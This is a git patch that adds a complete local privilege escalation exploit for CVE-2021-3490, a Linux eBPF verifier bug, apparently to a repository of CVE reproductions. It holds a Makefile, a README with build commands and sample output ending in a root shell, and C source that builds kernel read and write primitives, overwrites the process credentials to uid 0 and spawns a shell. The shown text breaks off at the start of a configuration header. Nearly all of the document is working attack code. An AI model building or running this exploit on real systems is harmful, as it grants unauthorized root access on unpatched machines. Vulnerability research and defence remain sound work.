From 94c41236e9885738ad746ae7e3a798646f4c233f Mon Sep 17 00:00:00 2001 From: ren1319 Date: Mon, 13 Mar 2023 14:43:32 +0800 Subject: [PATCH] add CVE-2021-3490 --- cve/linux-kernel/2021/CVE-2021-3490/Makefile | 16 + cve/linux-kernel/2021/CVE-2021-3490/README.md | 43 ++ .../2021/CVE-2021-3490/bin/.placeholder | 0 cve/linux-kernel/2021/CVE-2021-3490/bpf.c | 128 ++++ cve/linux-kernel/2021/CVE-2021-3490/exploit.c | 578 ++++++++++++++++++ .../2021/CVE-2021-3490/include/bpf_defs.h | 170 ++++++ .../CVE-2021-3490/include/exploit_configs.h | 114 ++++ .../2021/CVE-2021-3490/include/kernel_defs.h | 160 +++++ .../2021/CVE-2021-3490/include/kmem_search.h | 12 + .../2021/CVE-2021-3490/kmem_search.c | 276 +++++++++ cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml | 24 + openkylin_list.yaml | 1 + 12 files changed, 1522 insertions(+) create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/Makefile create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/README.md create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/bpf.c create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/exploit.c create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h create mode 100644 cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c create mode 100644 cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml diff --git a/cve/linux-kernel/2021/CVE-2021-3490/Makefile b/cve/linux-kernel/2021/CVE-2021-3490/Makefile new file mode 100644 index 00000000..ceff9b21 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/Makefile @@ -0,0 +1,16 @@ +CC=gcc +LPE =lpe + +BIN = bin/ +INC = include/ + +CMP = -o $(BIN)exploit.bin -I $(INC) exploit.c bpf.c kmem_search.c + +groovy: + $(CC) -DGROOVY $(CMP) + +hirsute: + $(CC) -DHIRSUTE $(CMP) + +clean: + rm $(BIN)exploit.bin diff --git a/cve/linux-kernel/2021/CVE-2021-3490/README.md b/cve/linux-kernel/2021/CVE-2021-3490/README.md new file mode 100644 index 00000000..dff07d77 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/README.md @@ -0,0 +1,43 @@ +# Linux_LPE_eBPF_CVE-2021-3490 + +LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.04.02 and 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. +and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. +The vulnerability was discovered by Manfred Paul [@_manfp](https://twitter.com/_manfp) and fixed in this [commit](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e). + +author: [@chompie1337](https://twitter.com/chompie1337) + +For educational/research purposes only. Use at your own risk. + +## Usage: + +To build for Ubuntu 20.04.02 and Ubuntu 20.10 (Groovy Gorilla): +``` +make groovy +``` +To build for Ubuntu 21.04 (Hirsute Hippo): +``` +make hirsute +``` +To run: +``` +bin/exploit.bin +[+] eBPF enabled, maps created! +[+] addr of oob BPF array map: ffffa008c1202110 +[+] addr of array_map_ops: ffffffff956572a0 +[+] kernel read successful! +[!] searching for init_pid_ns in kstrtab ... +[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a +[!] searching for init_pid_ns in ksymtab... +[+] addr of init_pid_ns ffffffff96062d00 +[!] searching for creds for pid: 770 +[+] addr of cred structure: ffffa0086758dec0 +[!] preparing to overwrite creds... +[+] success! 
enjoy r00t :) +# +``` + +Note: You **must** cleanly exit the root shell by typing `exit` to perform cleanup and avoid a kernel panic. + +Checkout the writeup [Kernel Pwning with eBPF: a Love Story](https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story). + +This research was sponsered by [Grapl](https://www.graplsecurity.com/). diff --git a/cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder b/cve/linux-kernel/2021/CVE-2021-3490/bin/.placeholder new file mode 100644 index 00000000..e69de29b diff --git a/cve/linux-kernel/2021/CVE-2021-3490/bpf.c b/cve/linux-kernel/2021/CVE-2021-3490/bpf.c new file mode 100644 index 00000000..e878fd23 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/bpf.c @@ -0,0 +1,128 @@ +#include +#include +#include +#include +#include +#include + + +int bpf(int cmd, union bpf_attr *attrs) +{ + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int create_map(union bpf_attr* attrs) +{ + int ret = -1; + + ret = bpf(BPF_MAP_CREATE, attrs); + + return ret; +} + +int update_map_element(int map_fd, uint64_t key, void* value, uint64_t flags) +{ + int ret = -1; + + union bpf_attr attr = + { + .map_fd = map_fd, + .key = (uint64_t)&key, + .value = (uint64_t)value, + .flags = flags, + }; + + ret = bpf(BPF_MAP_UPDATE_ELEM, &attr); + + return ret; +} + +int lookup_map_element(int map_fd, uint64_t key, void* value) +{ + int ret = -1; + union bpf_attr attr = + { + .map_fd = map_fd, + .key = (uint64_t)&key, + .value = (uint64_t)value, + }; + + ret = bpf(BPF_MAP_LOOKUP_ELEM, &attr); + + return ret; +} + +int obj_get_info_by_fd(union bpf_attr* attrs) +{ + int ret = -1; + + ret = bpf(BPF_OBJ_GET_INFO_BY_FD, attrs); + + return ret; +} + +int run_bpf_prog(struct bpf_insn* insn, uint32_t cnt, int* prog_fd_out) +{ + int ret = -1; + int prog_fd = -1; + char verifier_log_buff[0x200000] = {0}; + int socks[2] = {0}; + union bpf_attr prog_attrs = + { + .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = cnt, + .insns = (uint64_t)insn, + .license = (uint64_t)"", + .log_level = 2, + .log_size = sizeof(verifier_log_buff), + .log_buf = (uint64_t)verifier_log_buff + }; + + if(NULL != prog_fd_out) + { + prog_fd = *prog_fd_out; + } + + if(0 >= prog_fd) + { + prog_fd = bpf(BPF_PROG_LOAD, &prog_attrs); + } + + if(0 > prog_fd) + { + puts(verifier_log_buff); + goto done; + } + + if(0 != socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) + { + goto done; + } + + if(0 != setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(int))) + { + goto done; + } + + if(0x7 != write(socks[1], "ch0mpie", 0x7)) + { + goto done; + } + + if(NULL != prog_fd_out) + { + *prog_fd_out = prog_fd; + } + + else + { + close(prog_fd); + } + + ret = 0; + +done: + close(socks[0]); + close(socks[1]); + return ret; +} \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/exploit.c b/cve/linux-kernel/2021/CVE-2021-3490/exploit.c new file mode 100644 index 00000000..47c6f2ba --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/exploit.c @@ -0,0 +1,578 @@ +/** + LPE exploit for CVE-2021-3490 + + The vulnerability was discovered by Manfred Paul @_manfp and fixed in commit + https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e + + author: @chompie1337 + + For educational/research purposes only. Use at your own risk. 
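+
+  Exploit flow, as implemented below:
+
+    1. create two BPF array maps and load eBPF programs that trigger the 32-bit
+       bounds tracking bug, yielding a register the verifier models as constant 0
+       while its runtime value is 1
+    2. leak the kernel address of the oob map's values area and of array_map_ops
+    3. arbitrary read: point bpf_map->btf at (target - BTF_ID_OFFSET) and read
+       4 bytes at a time via BPF_OBJ_GET_INFO_BY_FD (the btf->id field)
+    4. scan kstrtab/ksymtab for init_pid_ns, then walk its pid radix tree to the
+       current task_struct and its cred pointer
+    5. arbitrary write: fake bpf_map->ops so map_push_elem points to
+       array_map_get_next_key, patch map_type/max_entries/spin_lock_off, then use
+       BPF_MAP_UPDATE_ELEM to write attacker-chosen 32-bit values
+    6. zero uid/gid/euid in the cred structure and spawn a shell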
+*/ + +#include +#include +#include +#include +#include +#include + +#include "bpf_defs.h" +#include "kernel_defs.h" +#include "kmem_search.h" +#include "exploit_configs.h" + + +int kernel_read_uint(exploit_context* pCtx, uint64_t addr, uint32_t* puiData) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + uint64_t btf_addr = addr - BTF_ID_OFFSET; + struct bpf_map_info_kernel info = {0}; + union bpf_attr attrs = + { + .info.bpf_fd = pCtx->oob_map_fd, + .info.info = (long long unsigned int)&info, + .info.info_len = sizeof(info) + }; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_BTF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_BTF_OFFSET), + // subtract BPF_MAP_BTF_OFFSET from oob map value pointer so it points to + // bpf_map->btf + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // load the leak address from store map + BPF_LDX_MEM(BPF_DW, LEAK_VAL_REG, STORE_MAP_REG, 8), + // set bpf_map->btf = leak address. using BPF syscall with command + // BPF_OBJ_GET_INFO_BY_FD will return the value of bpf_map->btf->id + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, LEAK_VAL_REG, 0), + BPF_EXIT_INSN() + }; + + memcpy(&vals[sizeof(uint64_t)], &btf_addr, sizeof(uint64_t)); + + if(0 != update_map_element(pCtx->store_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), &pCtx->prog_fd)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != obj_get_info_by_fd(&attrs)) + { + printf("[-] failed to leak memory with BPF_OBJ_GET_INFO_BY_FD \n"); + goto done; + } + + *puiData = info.btf_id; + ret = 0; + +done: + return ret; +} + +int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len) +{ + int ret = -1; + + for(uint32_t i = 0; i < len; i += sizeof(uint32_t)) + { + uint32_t val = 0; + + if(0 != kernel_read_uint(pCtx, addr + i, &val)) + { + goto done; + } + + *(uint32_t*)(buffer + i) = val; + } + + ret = 0; + +done: + return ret; +} + +int kernel_write_uint(exploit_context* pCtx, uint64_t addr, uint32_t val) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + + // addr will be set to index(val) + 1 in array_map_get_next_key + val -=1; + + memcpy(vals, &val, sizeof(uint32_t)); + + if(0 != update_map_element(pCtx->oob_map_fd, 0, vals, addr)) + { + printf("[-] kernel write failed!\n"); + goto done; + } + + ret = 0; + +done: + return ret; +} + +int kernel_write(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len) +{ + int ret = -1; + + for(uint32_t i = 0; i < len; i += sizeof(uint32_t)) + { + addr += i; + uint32_t val = *(uint32_t*)(buffer + i); + + if(0 != kernel_write_uint(pCtx, addr, val)) + { + goto done; + } + } + + ret = 0; + +done: + return ret; +} + +int create_bpf_maps(exploit_context* pCtx) +{ + int ret = -1; + int oob_map_fd = -1; + int store_map_fd = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + union bpf_attr map_attrs = + { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = ARRAY_MAP_SIZE, + .max_entries = 1, + }; + + oob_map_fd = create_map(&map_attrs); + store_map_fd = create_map(&map_attrs); + + if((oob_map_fd < 0) || (store_map_fd) < 0) + { + printf("[-] failed to create bpf array map!\n"); + goto done; + } + + if(0 != update_map_element(oob_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != 
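+        /* the store map is only used to pass values leaked by the eBPF programs
+           back to userspace (see the lookup_map_element() calls below) */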
update_map_element(store_map_fd, 0, vals, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + pCtx->oob_map_fd = oob_map_fd; + pCtx->store_map_fd = store_map_fd; + + ret = 0; + +done: + return ret; +} + +int leak_oob_map_ptr(exploit_context* pCtx) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + // extend the exploit register's invalid bounds to 64 bits + BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \ + // adding a register with invalid bounds to a pointer causes the verifier to + // mark it as an unbounded value, so we are able to leak its value by saving it + // in the store map + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), \ + // put the value in leak value register + BPF_MOV64_REG(LEAK_VAL_REG, OOB_MAP_REG), \ + // store the leaked BPF ptr into store map + BPF_STX_MEM(BPF_DW, STORE_MAP_REG, LEAK_VAL_REG, 8), \ + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != lookup_map_element(pCtx->store_map_fd, 0, vals)) + { + printf("[-] failed to retrieve storage map element!\n"); + goto done; + } + + memcpy(&pCtx->oob_map_ptr, &vals[sizeof(uint64_t)], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->oob_map_ptr)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int leak_array_map_ops(exploit_context* pCtx) +{ + int ret = -1; + char vals[ARRAY_MAP_SIZE] = {0}; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_OPS_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_OPS_OFFSET), + // subtract BPF_MAP_OPS_OFFSET from oob map value pointer, so it points + // to bpf_map->ops + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // read the value of array_map_ops + BPF_LDX_MEM(BPF_DW, LEAK_VAL_REG, OOB_MAP_REG, 0), + // store the leaked array_map_ops ptr into store map + BPF_STX_MEM(BPF_DW, STORE_MAP_REG, LEAK_VAL_REG, 8), + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + if(0 != lookup_map_element(pCtx->store_map_fd, 0, vals)) + { + printf("[-] failed to retrieve storage map element!\n"); + goto done; + } + + memcpy(&pCtx->array_map_ops, &vals[sizeof(uint64_t)], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->array_map_ops)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int test_kernel_read(exploit_context* pCtx) +{ + int ret = -1; + uint64_t kernel_addr = 0; + + pCtx->state = EXPLOIT_STATE_READ; + + if(0 != kernel_read(pCtx, pCtx->array_map_ops, (char*)&kernel_addr, sizeof(uint64_t))) + { + goto done; + } + + if(!IS_KERNEL_POINTER(kernel_addr)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +int prepare_kernel_write(exploit_context* pCtx) +{ + int ret = -1; + char array_map_ops[ARRAY_MAP_SIZE] = {0}; + uint64_t array_map_get_next_key = 0; + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, pCtx->store_map_fd), + exploit_primitive_pt2, + // store copy of exploit register + BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), + // load oob map values pointer in leak register + BPF_LD_IMM64(LEAK_VAL_REG, pCtx->oob_map_ptr), + // exploit reg value is BPF_MAP_OPS_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, 
BPF_MAP_OPS_OFFSET), + // subtract BPF_MAP_OPS_OFFSET from oob map value pointer, so it points + // to bpf_map->ops + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // overwrite bpf_map->ops to point to the first value in oob map, where we store + // fake bpf_map_ops structure + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, LEAK_VAL_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to 0 + BPF_MOV64_IMM(CONST_REG, 0x0), + // exploit reg value is BPF_MAP_SPIN_LOCK_OFF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_SPIN_LOCK_OFF_OFFSET), + // subtract BPF_MAP_SPIN_LOCK_OFF_OFFSET from oob map value pointer, so it points + // to bpf_map->spin_lock_off + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->spin_lock_off = 0 to bypass checks + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to 0xFFFFFFFF + BPF_MOV64_IMM(CONST_REG, 0xFFFFFFFF), + // exploit reg value is BPF_MAP_MAX_ENTRIES_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_MAX_ENTRIES_OFFSET), + // subtract BPF_MAP_MAX_ENTRIES_OFFSET from oob map value pointer, so it points + // to bpf_map->max_entries + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->max_entries = 0xFFFFFFFF + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + // restore oob map value pointer + BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG), + // restore exploit reg + BPF_MOV64_REG(EXPLOIT_REG, COPY_REG), + // set constant register to BPF_MAP_TYPE_STACK + BPF_MOV64_IMM(CONST_REG, BPF_MAP_TYPE_STACK), + // exploit reg value is BPF_MAP_TYPE_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_TYPE_OFFSET), + // subtract BPF_MAP_TYPE_OFFSET from oob map value pointer, so it points + // to bpf_map->map_type + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set bpf_map->map_type = BPF_MAP_TYPE_STACK to be able to call map_push_elem + BPF_STX_MEM(BPF_W, OOB_MAP_REG, CONST_REG, 0), + BPF_EXIT_INSN() + }; + + if(0 != kernel_read(pCtx, pCtx->array_map_ops, array_map_ops, BPF_MAP_OPS_OFFSET)) + { + goto done; + } + + memcpy(&array_map_get_next_key, &array_map_ops[MAP_OPS_GET_NEXT_KEY_OFFSET], sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(array_map_get_next_key)) + { + goto done; + } + + memcpy(&array_map_ops[MAP_OPS_PUSH_ELEM_OFFSET], &array_map_get_next_key, sizeof(uint64_t)); + + if(0 != update_map_element(pCtx->oob_map_fd, 0, array_map_ops, BPF_ANY)) + { + printf("[-] failed to update map element values!\n"); + goto done; + } + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] failed to run eBPF program!\n"); + goto done; + } + + pCtx->state = EXPLOIT_STATE_WRITE; + + ret = 0; + +done: + return ret; +} + +int overwrite_cred(exploit_context* pCtx) +{ + int ret = -1; + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_UID_OFFSET, 0)) + { + goto done; + } + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_GID_OFFSET, 0)) + { + goto done; + } + + if(0 != kernel_write_uint(pCtx, pCtx->cred + CRED_EUID_OFFSET, 0)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +void cleanup_read(exploit_context* pCtx) +{ + struct bpf_insn insn[] = + { + exploit_primitive_pt1(pCtx->oob_map_fd, 
pCtx->store_map_fd), + exploit_primitive_pt2, + // exploit reg value is BPF_MAP_BTF_OFFSET (verifier believes its 0) + BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, BPF_MAP_BTF_OFFSET), + // subtract BPF_MAP_BTF_OFFSET from oob map value pointer so it points to + // bpf_map->btf + BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG), + // set constant register to 0 + BPF_MOV64_IMM(CONST_REG, 0x0), + // overwrite the value of bpf_map->btf to 0 + BPF_STX_MEM(BPF_DW, OOB_MAP_REG, CONST_REG , 0), + BPF_EXIT_INSN() + }; + + if(0 != run_bpf_prog(insn, sizeof(insn) / sizeof(insn[0]), NULL)) + { + printf("[-] warning, failed to run cleanup read BPF program!\n"); + } + + pCtx->state = EXPLOIT_STATE_CLEAN; +} + +void cleanup_write(exploit_context* pCtx) +{ + uint64_t null = 0; + + // restore bpf_map->btf = NULL + if(0 != kernel_write(pCtx, pCtx->oob_map_ptr - BPF_MAP_BTF_OFFSET, (char*)&null, sizeof(uint64_t))) + { + printf("[-] warning, cleanup failed! this will cause instability...\n"); + goto done; + } + + // restore bpf_map->map_type = BPF_MAP_TYPE_ARRAY + if(0 != kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_TYPE_OFFSET, BPF_MAP_TYPE_ARRAY)) + { + printf("[-] warning, cleanup failed! this will cause instability...\n"); + goto done; + } + + // We can't restore the rest of the values without breaking the write primitive, and we can't run another BPF program + // because we overwrote spin_lock_off. However, this is enough to exit cleanly. + + pCtx->state = EXPLOIT_STATE_CLEAN; + +done: + return; +} + +void cleanup(exploit_context* pCtx) +{ + switch(pCtx->state) + { + case EXPLOIT_STATE_READ: + cleanup_read(pCtx); + break; + case EXPLOIT_STATE_WRITE: + cleanup_write(pCtx); + break; + case EXPLOIT_STATE_CLEAN: + default: + break; + } +} + +int main(int argc, char **argv) +{ + exploit_context ctx = {0}; + pid_t current_pid = getpid(); + + if(0 != create_bpf_maps(&ctx)) + { + printf("[-] failed to create bpf maps!\n"); + goto done; + } + + printf("[+] eBPF enabled, maps created!\n"); + + if(0 != leak_oob_map_ptr(&ctx)) + { + printf("[-] failed to leak ptr to BPF map!\n"); + goto done; + } + + printf("[+] addr of oob BPF array map: %lx\n", ctx.oob_map_ptr); + + if (0 != leak_array_map_ops(&ctx)) + { + printf("[-] failed to leak address of array_map_ops!\n"); + goto done; + } + + printf("[+] addr of array_map_ops: %lx\n", ctx.array_map_ops); + + if(0 != test_kernel_read(&ctx)) + { + printf("[-] kernel read failed!\n"); + goto done; + } + + printf("[+] kernel read successful!\n"); + printf("[!] searching for init_pid_ns in kstrtab ...\n"); + + if(0 != search_init_pid_ns_kstrtab(&ctx)) + { + printf("[-] failed to find init_pid_ns in kstrtab!\n"); + goto done; + } + + printf("[+] addr of init_pid_ns in kstrtab: %lx\n", ctx.init_pid_ns_kstrtab); + printf("[!] searching for init_pid_ns in ksymtab...\n"); + + if(0 != search_init_pid_ns_ksymtab(&ctx)) + { + printf("[-] failed to find init_pid_ns in ksymtab!\n"); + goto done; + } + + printf("[+] addr of init_pid_ns %lx\n", ctx.init_pid_ns); + printf("[!] searching for creds for pid: %0x\n", current_pid); + + if(0 != find_pid_cred(&ctx, current_pid)) + { + printf("[-] failed to find addr of current creds!\n"); + goto done; + } + + printf("[+] addr of cred structure: %lx\n", ctx.cred); + + if(0 != prepare_kernel_write(&ctx)) + { + printf("[-] failed to set up maps for kernel write!\n"); + goto done; + } + + printf("[!] preparing to overwrite creds...\n"); + + if(0 != overwrite_cred(&ctx)) + { + printf("[-] LPE failed :(\n"); + goto done; + } + + printf("[+] success! 
enjoy r00t :)\n"); + system("sh"); + +done: + cleanup(&ctx); + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h new file mode 100644 index 00000000..0dc497f2 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/bpf_defs.h @@ -0,0 +1,170 @@ +#ifndef _BPF_DEFS_H_ +#define _BPF_DEFS_H_ + + +/* Raw code statement block */ + +#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = CODE, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = IMM }) + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) + +/* Memory load, dst_reg = *(uint *) (src_reg + off16) */ + +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Memory store, *(uint *) (dst_reg + off16) = src_reg */ + +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */ + +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. 
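+   exploit_primitive_pt2 in exploit_configs.h relies on this 32-bit form: a JMP32
+   comparison constrains only the verifier's u32 bounds of the tested register.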
*/ + +#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = imm32 */ + +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_MOV32_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = src_reg */ + +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ + +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ + +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* Program exit */ + +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) + + +/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */ +#define BPF_LD_IMM64(DST, IMM) \ + BPF_LD_IMM64_RAW(DST, 0, IMM) + +/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) + +// varies from userspace bpf_map_info definition so need to redefine +struct bpf_map_info_kernel +{ + __u32 type; + __u32 id; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 btf_vmlinux_value_type_id; + __u64 netns_dev; + __u64 netns_ino; + __u32 btf_id; + __u32 btf_key_type_id; + __u32 btf_value_type_id; +} __attribute__((aligned(8))); + + +int create_map(union bpf_attr* map_attrs); +int update_map_element(int map_fd, uint64_t key, void* value, uint64_t flags); +int lookup_map_element(int map_fd, int64_t key, void* pDestBuff); +int obj_get_info_by_fd(union bpf_attr* attrs); +int run_bpf_prog(struct bpf_insn* insn, uint32_t cnt, int* prog_fd_out); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h new file mode 100644 index 